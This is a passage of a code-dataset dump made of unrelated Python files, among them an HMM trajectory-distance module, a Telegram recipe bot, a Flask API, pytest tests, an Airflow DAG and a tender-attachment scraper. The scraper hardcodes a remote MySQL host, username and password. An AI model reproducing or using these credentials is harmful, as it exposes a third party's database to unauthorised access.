{len(words)}')\n","sub_path":"2.OOP_in_Python/Practice_WEB_and_Dictionaries/someone/WikiParser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"53194834","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nImplementing distance definition in the paper: \r\nPorikli F. Trajectory distance metric using hidden markov model based representation. ECCVw, PETS 2004.\r\n@author: Cong\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nfrom scipy.cluster.vq import kmeans, vq\r\n\r\nclass Hmm(object):\r\n __slots__ = ['N','M', 'init', 'trans', 'mix']\r\n \r\n def __init__(self):\r\n self.N = None\r\n self.M = None\r\n self.init = None\r\n self.trans = None\r\n self.mix = None\r\n \r\n def printself(self):\r\n print (self.trans)\r\n print (self.mix[0].weight)\r\n \r\nclass Mix(object):\r\n __slots__ = ['M', 'mean', 'var', 'weight']\r\n def __init__(self):\r\n self.M = None\r\n self.mean = None\r\n self.var = None\r\n self.weight = None\r\n \r\nclass Param(object):\r\n __slots__ = ['c','alpha','beta','ksai','gama']\r\n def __init__(self):\r\n self.c = None\r\n self.alpha = None\r\n self.beta = None\r\n self.ksai = None\r\n self.gama = None\r\n \r\n \r\ndef train(OneClass, M):\r\n \r\n hmm = inithmm(OneClass, M)\r\n \r\n pout = [] \r\n for loop in range(0, 100):\r\n \r\n hmm = baum(hmm, OneClass)\r\n \r\n # total output prob\r\n temp = 0\r\n for k in range(len(OneClass)):\r\n prob = viterbi(hmm, OneClass[k])[0]\r\n temp = temp + prob\r\n #print ('total output prob (log) = ', temp)\r\n pout.append(temp)\r\n \r\n # compare distances between two HMMs\r\n if loop>0:\r\n if abs((pout[loop]-pout[loop-1])/pout[loop]) < 5e-6:\r\n #print ('Converged!')\r\n return hmm\r\n \r\n #print ('Exit when it does not converge after 100 loops.')\r\n \r\n return hmm\r\n\r\n\r\ndef inithmm(samples, M):\r\n hmm = Hmm()\r\n N = len(M) # state num\r\n hmm.N = N # hmm state num\r\n hmm.M = M # Gaussian num in each state\r\n \r\n # initial probability matrix\r\n hmm.init = np.zeros((N,1)) \r\n hmm.init[0] = 1\r\n \r\n # trans prob mat\r\n hmm.trans = np.zeros((N,N))\r\n for i in range(N-1):\r\n hmm.trans[i][i] = 0.5\r\n hmm.trans[i][i+1] = 0.5\r\n hmm.trans[N-1,N-1] = 1\r\n \r\n # initial clustering of pdf\r\n # average segment\r\n seg_ind = []\r\n for k in range(len(samples)):\r\n T = len(samples[k]) # must be T >= 2*N\r\n seg_ind.append(np.r_[np.arange(0, T, np.round(T/N)), T].astype(np.int))\r\n \r\n # Kmeans cluster the vectors in each state and get a continuous mixed normal dist\r\n hmm.mix = []\r\n for i in range(N):\r\n # combine the vectors in same cluster and states]=\r\n vector = np.zeros((0, samples[0].shape[1]))\r\n # gather all the sample features of each state in the same model to a new feature matrix\r\n for k in range(len(samples)):\r\n seg1 = seg_ind[k][i] # seg i start\r\n seg2 = seg_ind[k][i+1] # seg i+1 end\r\n vector = np.vstack((vector, samples[k][seg1:seg2, :]))\r\n mix = getmix(vector, M[i])\r\n hmm.mix.append(mix)\r\n \r\n return hmm\r\n\r\n\r\ndef getmix(vector, M):\r\n \r\n # K-means to M clusters\r\n mean = kmeans(vector, M)[0]\r\n nn = vq(vector, mean)[0]\r\n \r\n # only keep the items on the diagonal\r\n var = np.zeros((M, vector.shape[1]))\r\n for j in range(0,M):\r\n ind = (j==nn)\r\n tmp = vector[ind,:]\r\n var[j,] = np.std(tmp, axis=0, ddof=1)\r\n\r\n # normalize the sample numbers as weights\r\n weight = np.zeros((M, 1))\r\n for j in range(0,M):\r\n weight[j] = np.sum((j == nn))\r\n weight = weight / np.sum(weight)\r\n \r\n mix = Mix()\r\n mix.M = M\r\n mix.mean = mean\r\n mix.var = var ** 2\r\n mix.weight = weight\r\n return mix\r\n \r\n\r\n# Baum-welch\r\ndef baum(hmm, samples):\r\n mix = hmm.mix\r\n N = len(mix)\r\n K = len(samples)\r\n \r\n SIZE = samples[0].shape[1]\r\n \r\n #compute forward and backkward prob matrices. note the multi-observation seqs and underflow issues\r\n #print ('Computing sample parameters...')\r\n Allparam = []\r\n for k in range(1,K+1):\r\n #print (k,end=' ')\r\n param = getparam(hmm, samples[k-1])\r\n Allparam.append(param)\r\n #print (\"\\n\")\r\n \r\n # re-estimate the trans prob matrix A: trans\r\n #print ('\\nRe-estimating the trans prob matrix A...')\r\n for i in range(1,N):\r\n denom = 0\r\n for k in range(1,K+1):\r\n tmp = Allparam[k-1].ksai[:,i-1,:]\r\n denom = denom + sum(tmp.flatten())\r\n for j in range(i,i+2):\r\n nom = 0\r\n for k in range(1,K+1):\r\n tmp = Allparam[k-1].ksai[:,i-1,j-1] \r\n nom = nom + sum(tmp.flatten(1))\r\n hmm.trans[i-1,j-1] = nom / denom\r\n \r\n # re-estimate the parameters of Gaussian mixture\r\n #print ('Re-estimating Gaussian mixture model parameters...')\r\n for l in range(1,N+1):\r\n for j in range(1,hmm.M[l-1]+1):\r\n #print (l,j,end=' ')\r\n # compute the means and var of each pdf\r\n nommean = np.zeros((1,SIZE))\r\n nomvar = np.zeros((1,SIZE))\r\n denom = 0\r\n for k in range(1,K+1):\r\n T = samples[k-1].shape[0]\r\n for t in range(1,T+1):\r\n x = samples[k-1][t-1,]\r\n nommean = nommean + Allparam[k-1].gama[t-1,l-1,j-1] * x\r\n nomvar = nomvar + Allparam[k-1].gama[t-1,l-1,j-1] * (x-mix[l-1].mean[j-1,])**2\r\n denom = denom + Allparam[k-1].gama[t-1,l-1,j-1]\r\n hmm.mix[l-1].mean[j-1,] = nommean / denom\r\n hmm.mix[l-1].var[j-1,] = nomvar / denom\r\n \r\n # compute the weights of each pdf\r\n nom = 0\r\n denom = 0\r\n for k in range(1,K+1):\r\n tmp = Allparam[k-1].gama[:,l-1,j-1]\r\n nom = nom + sum(tmp.flatten(1))\r\n tmp = Allparam[k-1].gama[:,l-1,]\r\n denom = denom + sum(tmp.flatten(1))\r\n hmm.mix[l-1].weight[j-1] = nom/denom\r\n #print ('\\n')\r\n return hmm\r\n \r\n \r\ndef getparam(hmm, O):\r\n # given output seq O, compute forward prob alpha, backward prob beta, parameter c, ksai, and gama\r\n # Inputs:\r\n # hmm -- HMM model params\r\n # O -- n*d observation seq\r\n # Output:\r\n # param -- params\r\n T = O.shape[0] # seq length (rows), actually frame number\r\n \r\n init = hmm.init # initial prob\r\n trans = hmm.trans\t# trans prob\r\n mix = hmm.mix\t # Gaussian mixture\r\n N = hmm.N \t # HMM state num\r\n \r\n # given observation seq O, compute the forward prb alpha\r\n alpha = np.zeros((T,N)) # T is frame number\r\n # first frame\r\n x = O[0,]\r\n for i in range(1,N+1):\r\n alpha[0,i-1] = init[i-1].dot(mixture(mix[i-1],x))\r\n # forward prob at t = 1\r\n c = np.zeros((T,1))\r\n c[0] = 1/sum(alpha[0,])\r\n alpha[0,] = c[0]*(alpha[0,])\r\n #print alpha[0]\r\n #forward prob at t=2:T\r\n for t in range(2,T+1):\r\n for i in range(1,N+1):\r\n temp = 0\r\n for j in range(1,N+1):\r\n temp = temp + alpha[t-2,j-1] * trans[j-1,i-1]\r\n alpha[t-1,i-1] = temp * mixture(mix[i-1],O[t-1,])\r\n c[t-1]= 1/sum(alpha[t-1,])\r\n alpha[t-1,] = c[t-1] * alpha[t-1,]\r\n \r\n # given observation seqO, compute the backward prb beta\r\n beta = np.zeros((T,N)) \r\n # backward prob at t=T\r\n for l in range(1,N+1):\r\n beta[T-1,l-1] = c[T-1] \r\n # backward probs at t=T-1:1\r\n for t in range(T-1,0,-1):\r\n x = O[t,]\r\n for i in range(1,N+1):\r\n for j in range(1,N+1):\r\n beta[t-1,i-1] = beta[t-1,i-1] + (beta[t,j-1]) * mixture(mix[j-1],x) * (trans[i-1,j-1])\r\n \r\n if c[t-1] < 1.0:\r\n beta[t-1,] = c[t-1] * beta[t-1,] # original computation\r\n else:\r\n overjudge = np.finfo(np.float64).max / c[t-1] # in case of overflow\r\n if overjudge < np.max(beta[t-1,]):\r\n #print (c[t-1])\r\n overidx = beta[t-1,] > (overjudge)\r\n beta[t-1,][overidx] = np.finfo(np.float64).max\r\n beta[t-1,][np.bitwise_not(overidx)] = c[t-1] * beta[t-1,][np.bitwise_not(overidx)]\r\n else:\r\n beta[t-1,] = c[t-1] * beta[t-1,] # original computation\r\n \r\n # ksai\r\n ksai = np.zeros((T-1,N,N))\r\n for t in range(1,T):\r\n denom = sum(alpha[t-1,]*beta[t-1,])\r\n for i in range(1,N):\r\n for j in range(i ,i+2):\r\n nom = alpha[t-1,i-1] * trans[i-1,j-1] * mixture(mix[j-1],O[t,]) * beta[t,j-1]\r\n ksai[t-1,i-1,j-1] = c[t-1] * nom/denom\r\n \r\n # mixture output prob: gama\r\n gama = np.zeros((T,N,max(hmm.M)))\r\n for t in range(1,T+1):\r\n pab = np.zeros((N,1))\r\n for l in range(1,N+1):\r\n pab[l-1] = alpha[t-1,l-1] * beta[t-1,l-1]\r\n x = O[t-1,]\r\n for l in range(1,N+1):\r\n prob = np.zeros((mix[l-1].M,1))\r\n for j in range(1,mix[l-1].M+1):\r\n m = mix[l-1].mean[j-1,]\r\n v = mix[l-1].var[j-1,]\r\n prob[j-1] = mix[l-1].weight[j-1] * pdf(m, v, x)\r\n tmp = pab[l-1]/sum(pab)\r\n for j in range(1,mix[l-1].M+1):\r\n gama[t-1,l-1,j-1] = tmp.dot(prob[j-1])/sum(prob)\r\n \r\n param = Param()\r\n param.c = c\r\n param.alpha = alpha\r\n param.beta = beta\r\n param.ksai = ksai\r\n param.gama = gama\r\n \r\n return param\r\n \r\n\r\ndef mixture(mix, x):\r\n # compute the output prob of an obserrvation vector x at an HMM state\r\n # compute the output prob\r\n # Input:\r\n # mix -- Gaussian mixture\r\n # x -- input vector, SIZE*1\r\n # Output:\r\n # prob -- output prob\r\n M = mix.M\r\n prob = 0.0\r\n for j in range(1,M + 1):\r\n m = mix.mean[j-1,]\r\n v = mix.var[j-1,]\r\n w = mix.weight[j-1]\r\n prob = prob + w * pdf(m, v, x)\r\n \r\n return prob\r\n \r\n\r\ndef pdf(m, v, x):\r\n # single Gaussian prob density function (p.d.f.)\r\n #Input:\r\n #m -- mean vector, SIZE*1\r\n #v -- var vector, SIZE*1\r\n #x -- input vector, SIZE*1\r\n #Output:\r\n #p -- output prob\r\n eps = np.finfo(np.float64).tiny\r\n if v.min() < eps or np.prod(v) < eps:\r\n return 1.0 # in case of ZeroDivisionError\r\n p = (2 * np.pi * np.prod(v)) ** -0.5 * np.exp(-0.5 * ((x-m)/v).dot((x-m).T))\r\n if p < eps:\r\n p = eps # in case of overflow\r\n return p \r\n \r\n\r\ndef viterbi(hmm, O):\r\n # Viterbi algorithm\r\n # given output seq O, compute the forward prob delta and backward prob fai\r\n #Input:\r\n # hmm -- hmm model\r\n # O -- input observation seq, N*D, D is the dim of vector\r\n #Output:\r\n # prob -- output prob\r\n # q -- state seq\r\n init = hmm.init.copy()\r\n trans = hmm.trans.copy()\r\n mix = hmm.mix\t # Gaussian mixture\r\n N = hmm.N\t # HMM state num\r\n T = O.shape[0]\r\n \r\n # compute log(init)\r\n ind1 = (init>0).nonzero()[0]\r\n ind0 = (init<=0).nonzero()[0]\r\n init[ind0] = np.NINF\r\n init[ind1] = np.log(init[ind1])\r\n \r\n # compute log(trans)\r\n ind1 = (trans>0).nonzero()\r\n ind0 = (trans<=0).nonzero()\r\n trans[ind0] = np.NINF\r\n trans[ind1] = np.log(trans[ind1])\r\n \r\n # initialization\r\n delta = np.zeros((T,N))\r\n fai = np.zeros((T,N))\r\n q = np.zeros((T,1))\r\n \r\n #t=1 viterbi initialization 当t=1\r\n x = O[0,:]\r\n for i in range(1,N+1):\r\n delta[0,i-1] = init[i-1]+ np.log(mixture(mix[i-1],x))\r\n \r\n #t=2:T viterbi iterationo t>2\r\n for t in range(2,T+1):\r\n for j in range(1,N+1):\r\n delta[t-1,j-1] = np.max(delta[t-2,] + trans[:,j-1].T)\r\n fai[t-1,j-1] = np.argmax(delta[t-2,] + trans[:,j-1].T)\r\n x = O[t-1,:]\r\n delta[t-1,j-1] = delta[t-1,j-1] + np.log(mixture(mix[j-1],x))\r\n \r\n # final prob\r\n prob = np.max(delta[T-1,:])\r\n q[T-1] = np.argmax(delta[T-1,:])\r\n\r\n # best state path\r\n for t in range(T-1,2,-1):\r\n q[t-1] = fai[t, int(q[t]-1)]\r\n \r\n return prob, q\r\n\r\n\r\ndef hmmdist(sample0, sample1, M=np.array([1,1,1,1,1,1])):\r\n hmm0 = train([sample0], M)\r\n hmm1 = train([sample1], M)\r\n prob00 = viterbi(hmm0, sample0)[0]\r\n prob01 = viterbi(hmm0, sample1)[0]\r\n prob10 = viterbi(hmm1, sample0)[0]\r\n prob11 = viterbi(hmm1, sample1)[0]\r\n #print(prob00, prob01, prob10, prob11)\r\n dist = prob01 + prob10 - prob00 - prob11\r\n return np.abs(dist)\r\n\r\n\r\ndef hmmdist_eval(hmm0, hmm1, sample0, sample1):\r\n prob00 = viterbi(hmm0, sample0)[0]\r\n prob01 = viterbi(hmm0, sample1)[0]\r\n prob10 = viterbi(hmm1, sample0)[0]\r\n prob11 = viterbi(hmm1, sample1)[0]\r\n #print(prob00, prob01, prob10, prob11)\r\n dist = prob01 + prob10 - prob00 - prob11\r\n return np.abs(dist)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n M = np.array([1,1,1]) # hmm: 3 states, 1 GMM\r\n \r\n print ('Loading data...')\r\n from datasets import read_cross_dataset#, read_traffic_dataset\r\n train_set, train_labels, test_set, true_labels = read_cross_dataset()\r\n sample0 = train_set[20]\r\n sample1 = train_set[25]\r\n sample2 = train_set[100]\r\n \r\n print ('Training...')\r\n print(hmmdist(sample0, sample1))\r\n print(hmmdist(sample1, sample2))\r\n print(hmmdist(sample1, sample1))\r\n \r\n# #save hmm models\r\n# f = open('myhmm.dat','wb')\r\n# pickle.dump(hmm1, f, -1)\r\n# f.close()\r\n \r\n print ('Completed')\r\n","sub_path":"Exp2/hmm_dist.py","file_name":"hmm_dist.py","file_ext":"py","file_size_in_byte":13619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"207922037","text":"import re, os, wget\n\npath = 'C:\\\\users\\\\alex\\\\downloads\\\\temp'\n\nwith open('link.txt','r') as f:\n for line in f:\n for word in line.split():\n url = word\n file_name = wget.download(url, path) \n\nprint(type(word))\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''for line in lines:\n\n\turls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', line)\n\nprint (urls) '''","sub_path":"tests/getlinks.py","file_name":"getlinks.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"61021250","text":"import logging\n\nfrom aiogram.dispatcher.filters import Command, Text\n\nfrom Bot import config\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom Db.db import SqliteRecipes as db\n\n# задаем уровень логов\nlogging.basicConfig(level=logging.INFO)\n\n# инициализация бд\nbd = db()\n\n# иницилизируем бота\nbot = Bot(token=config.API_TOKEN)\ndp = Dispatcher(bot)\n\nmain_menu = types.ReplyKeyboardMarkup(\n keyboard=[\n [\n types.KeyboardButton(text='Профиль'),\n types.KeyboardButton(text='История поисков'),\n ],\n [\n types.KeyboardButton(text='Избранное'),\n types.KeyboardButton(text='Поиск'),\n ],\n ],\n resize_keyboard=True\n)\n\nsearch_menu = types.ReplyKeyboardMarkup(\n keyboard=[\n [\n types.KeyboardButton(text='поиск по ингридеентам'),\n types.KeyboardButton(text='поиск по по категориям'),\n types.KeyboardButton(text='показать все категории'),\n ],\n [\n types.KeyboardButton(text='Вернуться'),\n ],\n ],\n resize_keyboard=True\n)\n\n\n# клава\n\n@dp.message_handler(Command(\"start\"))\nasync def show_menu(message: types.Message):\n await message.answer(f\"Приветствуем в нашем боте {message.from_user.first_name}\\n Мы поможем тебе найти рецептики\",\n reply_markup=main_menu)\n bd.add_user(message.from_user.id)\n\n\n@dp.message_handler(Text(equals='Профиль'))\nasync def get_food(message: types.Message):\n await message.answer(f\"Вы выбрали {message.text}\")\n\n\n@dp.message_handler(Text(equals='История поисков'))\nasync def get_food(message: types.Message):\n await message.answer(f\"Вы выбрали {message.text}\")\n\n\n@dp.message_handler(Text(equals='Избранное'))\nasync def get_food(message: types.Message):\n await message.answer(f\"Вы выбрали {message.text}\")\n\n\n@dp.message_handler(Text(equals='Поиск'))\nasync def get_food(message: types.Message):\n await message.answer(f\"Вы выбрали {message.text}\", reply_markup=search_menu)\n\n\n@dp.message_handler(Text(equals='Вернуться'))\nasync def get_food(message: types.Message):\n await message.answer(f\"Вы вернулись\", reply_markup=main_menu)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp)\n","sub_path":"Bot/telegram-bot.py","file_name":"telegram-bot.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"157085437","text":"import numpy as np\n\n# Import Dependencies\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import func\n\nfrom flask import Flask, jsonify\n\n\n#################################################\n# Database Setup\n#################################################\n# Create an engine for the chinook.sqlite database\nengine = create_engine(\"sqlite:///../Resources/chinook.sqlite\", echo=False)\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nInvoices = Base.classes.invoices\nItems = Base.classes.invoice_items\n\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
\"\n f\"/api/countries
\"\n f\"/api/invoice_total
\"\n f\"/api/postal_codes_country/
\"\n f\"/api/item_totals_country/
\"\n f\"/api/item_totals
\"\n f\"/api/item_totals_all_postal_code/
\"\n )\n\n\n@app.route(\"/api/countries\")\ndef countries():\n \"\"\"Return a list of all passenger names\"\"\"\n # Query all passengers\n results = session.query(Invoices.BillingCountry).group_by(Invoices.BillingCountry).all()\n\n # Convert list of tuples into normal list\n all = list(np.ravel(results))\n\n return jsonify(all)\n\n@app.route(\"/api/invoice_total\")\ndef invoice_total():\n \"\"\"# Design a query that lists the invoices totals for each billing country \n# and sort the output in descending order.\"\"\"\n # Query all passengers\n results = session.query(Invoices.BillingCountry, func.sum(Invoices.Total)).\\\n group_by(Invoices.BillingCountry).\\\n order_by(func.sum(Invoices.Total).desc()).all()\n\n results = [(item[0], float(item[1])) for item in results]\n\n # Convert list of tuples into normal list\n invoice = list(np.ravel(results))\n\n return jsonify(invoice)\n\n@app.route(\"/api/postal_codes_country/\")\ndef postal_codes(country_name):\n \"\"\"# List all of the Billing Postal Codes for the country.\"\"\"\n\n results = session.query(Invoices.BillingPostalCode).\\\n filter(Invoices.BillingCountry == country_name).group_by(Invoices.BillingPostalCode).all()\n\n postal_codes = list(np.ravel(results))\n\n return jsonify(postal_codes)\n\n\n# @app.route(\"/api/item_totals_country/\")\n# def item_totals(country_name):\n# \"\"\"Calculate the Item Totals (sum(UnitPrice * Quantity)) for the country\"\"\"\n# results = session.query(func.sum(Items.UnitPrice * Items.Quantity)).\\\n# filter(Invoices.InvoiceId == Items.InvoiceId).\\\n# filter(Invoices.BillingCountry == country_name).scalar()\n# item_totals = list(np.ravel(results))\n\n# return jsonify(item_totals)\n\n\n# @app.route(\"/api/item_totals_all_postal_code/\")\n# def item_totals(country_name):\n# # Calculate the Item Totals `sum(UnitPrice * Quantity)` for each Billing Postal Code in the country\n# # Sort the results in descending order by Total\n# results = session.query(Invoices.BillingPostalCode, func.sum(Items.UnitPrice * Items.Quantity)).\\\n# filter(Invoices.InvoiceId == Items.InvoiceId).\\\n# filter(Invoices.BillingCountry == country_name).\\\n# group_by(Invoices.BillingPostalCode).\\\n# order_by(func.sum(Items.UnitPrice * Items.Quantity).desc()).all()\n\n# item_totals_per_code = list(np.ravel(results))\n\n# return jsonify(item_totals_per_code)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"Flask/Flask_Database and API setup.py","file_name":"Flask_Database and API setup.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"400154410","text":"from datetime import timedelta\n\nimport pytest\n\nfrom backend import settings\nfrom forecasting.models import PlatformUser, Survey\nfrom forecasting.testing.testing_data.recipes import Recipes\n\n\n@pytest.mark.django_db\ndef create_platform_user_for_survey_tests():\n # Create user from recipe using PlatformUser.create()\n Recipes.make_platform_user(\n htpaa_id=1\n ).create()\n\n return PlatformUser.objects.filter(htpaa_id=1)[0]\n\n\n@pytest.mark.django_db\ndef test_survey_is_added_to_database_correctly():\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n\n # Create WHO-5 survey from recipe using SurveyWHOFive.create()\n Survey(\n user=user,\n answer_one=1,\n answer_two=2,\n answer_three=3,\n answer_four=4,\n answer_five=5\n ).create()\n\n # Fetch from db filtering on user and answers\n survey_from_db = Survey.objects.get(user__pk=user.pk)\n\n # Assert fetched object has pk and correct information\n assert survey_from_db.survey_type == 1\n assert survey_from_db.answers == [1, 2, 3, 4, 5]\n\n\n@pytest.mark.django_db\ndef test_survey_scores_are_evaluated_correctly():\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n\n # Create WHO-5 survey from recipe using SurveyWHOFive.create()\n Survey(\n user=user,\n answer_one=1,\n answer_two=1,\n answer_three=1,\n answer_four=1,\n answer_five=1\n ).create()\n\n # Fetch survey from db\n survey_from_db = Survey.objects.get(user__pk=user.pk)\n\n # assert calculated values\n assert survey_from_db.raw_score == 5\n assert survey_from_db.total_score == 20\n\n\n@pytest.mark.django_db\ndef test_survey_risk_levels_are_set_correctly():\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n\n # Create WHO-5 surveys from recipe using SurveyWHOFive.create()\n Survey(\n user=user,\n answer_one=1,\n answer_two=1,\n answer_three=1,\n answer_four=1,\n answer_five=1\n ).create()\n\n Survey(\n user=user,\n answer_one=2,\n answer_two=2,\n answer_three=2,\n answer_four=2,\n answer_five=2\n ).create()\n\n Survey(\n user=user,\n answer_one=3,\n answer_two=3,\n answer_three=3,\n answer_four=3,\n answer_five=3\n ).create()\n\n # Fetch survey queryset from db\n surveys_from_db = Survey.objects.all()\n\n # Assert calculated flags\n assert surveys_from_db[0].risk_level == 3\n assert surveys_from_db[1].risk_level == 2\n assert surveys_from_db[2].risk_level == 1\n\n\n@pytest.mark.django_db\ndef test_subtract_days_only_works_in_debug_mode():\n # Assert DEBUG mode is True\n assert settings.DEBUG is True\n # Set DEBUG mode to False\n settings.DEBUG = False\n # Assert DEBUG mode is False\n assert settings.DEBUG is False\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n # Create Survey\n Survey(\n user=user,\n answer_one=1,\n answer_two=1,\n answer_three=1,\n answer_four=1,\n answer_five=1\n ).create()\n # Fetch Survey from DB\n survey_from_db = Survey.objects.get(user__pk=user.pk)\n # Assert Survey.subtract_days_from_datetime returns False\n assert survey_from_db.subtract_days_from_datetime(1) is False\n # Set DEBUG mode to True\n settings.DEBUG = True\n\n\n@pytest.mark.django_db\ndef test_subtract_days_correctly_subtracts_days():\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n # Create Survey\n Survey(\n user=user,\n answer_one=1,\n answer_two=1,\n answer_three=1,\n answer_four=1,\n answer_five=1\n ).create()\n # Fetch Survey from DB\n survey_from_db = Survey.objects.get(user__pk=user.pk)\n # Set old datetime\n old_datetime = survey_from_db.datetime\n # Subtract day from survey datetime\n survey_from_db.subtract_days_from_datetime(1)\n # Set new datetime\n new_datetime = survey_from_db.datetime\n # Assert new datetime days is one less than old datetime days\n assert old_datetime - timedelta(days=+1) == new_datetime\n\n\n\n\n\n","sub_path":"backend/forecasting/testing/test_models/test_survey.py","file_name":"test_survey.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"49873955","text":"from airflow.operators import BashOperator\nfrom airflow.models import DAG\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner': 'airflow',\n 'start_date': datetime.now() - timedelta(minutes=1),\n 'email': [],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\ndag = DAG('airflow_practical_exercise', default_args=default_args, schedule_interval=None, start_date=datetime.now() - timedelta(minutes=1))\n\n\n\n\nMysqlToHive = BashOperator(\n task_id='MysqlToHive',\n bash_command=\"\"\" sh /home/cloudera/Documents/PracticalExercise2/MysqlToHive.sh \"\"\",\n dag=dag)\n \ncsvToHive = BashOperator(\n task_id='csvToHive',\n bash_command=\"\"\" sh /home/cloudera/Documents/PracticalExercise2/csvToHive.sh \"\"\",\n dag=dag)\n\nReportingTables1= BashOperator(\n task_id='ReportingTables1',\n bash_command=\"\"\" sh /home/cloudera/Documents/PracticalExercise2/ReportingTables1.sh \"\"\",\n dag=dag)\n\nReportingTables2= BashOperator(\n task_id='ReportingTables2',\n bash_command=\"\"\" sh /home/cloudera/Documents/PracticalExercise2/ReportingTables2.sh \"\"\",\n dag=dag)\n\n\n\n\nMysqlToHive.set_downstream(ReportingTables1)\ncsvToHive.set_downstream(ReportingTables1)\nMysqlToHive.set_downstream(ReportingTables2)\n\n","sub_path":"Exercise2/airflow_practical_exercise.py","file_name":"airflow_practical_exercise.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"497791916","text":"# Finds how basketball scoring is done from inputs of:\n# Minutes played, field goals made, field goal attempts, 3 point baskets made,\n# 3 point attempts, free throws made and free throw attempts.\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom tensorflow import keras\n\n# Make numpy values easier to read.\nnp.set_printoptions(precision=3, suppress=True)\n\ngamelog = pd.read_csv(\"data/lebron_gamelog.csv\")\ngamelog.head()\nprint(gamelog)\n\ngamelog_features = gamelog.copy()\npoints = gamelog_features.pop('PTS')\ngamelog_features.pop('Player')\ngamelog_features.pop('Date')\ngamelog_features.pop('FDP')\ngamelog_features.pop('DKP')\n\nprint(gamelog_features)\nprint(points)\n\nmodel = tf.keras.Sequential([keras.layers.Dense(units=1, input_shape=[18])])\nmodel.compile(optimizer=keras.optimizers.Adam(1.0), loss='mean_squared_error')\n\nmodel.fit(gamelog_features, points, epochs=500)\nprint('weights:', model.weights)\n# Should print 24 = 2 x 9 + 6\nprint(model.predict([[46.8, 9.0, 28.0, 0.0, 7.0, 6.0, 10.0, 6.0, 10.0, 16.0, 9.0, 2.0, 0.0, 3.0, 0.0, -3.0, 1, 0]]))","sub_path":"src/main/python/ml/total_points_csv.py","file_name":"total_points_csv.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"38241710","text":"import datetime\nimport random\nimport urllib.request\n\nimport pymysql\n\nUSER_AGENTS_FILE = 'user_agents.txt'\n\n\ndef connect_bd(baza):\n con = pymysql.connect(host=\"86.57.133.250\", port=3306, user=\"parser\", passwd=\"Dft56Point\", db=baza, charset='utf8',\n init_command='SET NAMES UTF8', cursorclass=pymysql.cursors.DictCursor, autocommit=True)\n return con\n\n\ndef LoadUserAgents(uafile=USER_AGENTS_FILE):\n uas = []\n with open(uafile, 'rb') as uaf:\n for ua in uaf.readlines():\n if ua:\n uas.append(ua.strip()[1:-1 - 1])\n random.shuffle(uas)\n return uas\n\n\ndef main():\n dt = datetime.datetime.now()\n dt = str(dt).split(' ')[0]\n connect = connect_bd(\"tenders_test\")\n cur = connect.cursor()\n cur.execute(\n \"\"\"SELECT url, file_name FROM attachment AS att LEFT JOIN tender AS t ON att.id_tender= t.id_tender \n WHERE t.end_date > %s AND t.cancel = 0\"\"\", (dt,))\n res_att = cur.fetchall()\n count = 0\n user_agents = LoadUserAgents()\n for r in res_att:\n try:\n ua = random.choice(user_agents)\n req1 = urllib.request.Request(url=r['url'], headers={\"Connection\": \"close\",\n 'User-Agent': ua})\n f = urllib.request.urlopen(req1, timeout=40)\n file_name = f\"./download/{r['file_name']}\"\n with open(file_name, 'wb') as file:\n file.write(f.read())\n count += 1\n print(count)\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as exm:\n print(exm)\n","sub_path":"test_download_file.py","file_name":"test_download_file.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"181078435","text":"'''\nRun a pipeline stage either locally or on the cluster,\ntaking into account the configuration settings,\nand command line options of the pipeline.\n'''\n\nfrom ruffus.drmaa_wrapper import run_job, error_drmaa_job\n\n#Install drmaa and set drmaa to virtual environment\n\n#export SGE_ROOT=\"/var/lib/gridengine\"\n\n# sun grid engine memory is requested in MB, but the config file specifies in GB\nMEGABYTES_IN_GIGABYTE = 1024\n\n'''\nSGE options:\n\n-account=name Charge job to specified accounts\n-mem=MB Minimum amount of real 